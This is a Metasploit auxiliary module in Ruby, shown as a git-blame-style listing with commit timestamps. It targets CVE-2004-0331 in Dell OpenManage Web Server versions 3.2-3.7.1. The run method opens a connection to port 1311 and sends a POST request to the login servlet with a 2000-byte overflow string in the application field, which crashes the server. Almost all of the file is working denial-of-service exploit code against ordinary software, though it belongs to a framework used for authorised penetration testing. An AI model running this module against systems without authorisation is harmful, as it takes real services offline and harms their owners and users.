2009-06-23 13:23:50 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-06-23 13:23:50 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a heap overflow in the Dell OpenManage
|
|
|
|
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
|
|
|
|
exists due to a boundary error within the handling of POST requests,
|
|
|
|
where the application input is set to an overly long file name.
|
|
|
|
This module will crash the web server, however it is likely exploitable
|
|
|
|
under certain conditions.
|
|
|
|
},
|
2017-11-08 16:00:24 +00:00
|
|
|
'Author' => [ 'aushack' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
|
|
|
|
[ 'BID', '9750' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '4077' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'CVE', '2004-0331' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Feb 26 2004'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(1311),
|
|
|
|
OptBool.new('SSL', [true, 'Use SSL', true]),
|
|
|
|
],
|
|
|
|
self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
connect
|
|
|
|
|
|
|
|
foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
|
|
|
|
|
|
|
|
sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
|
|
|
|
sploit << "Content-Length: #{foo.length}\r\n\r\n"
|
|
|
|
sploit << foo
|
|
|
|
|
|
|
|
sock.put(sploit +"\r\n\r\n")
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|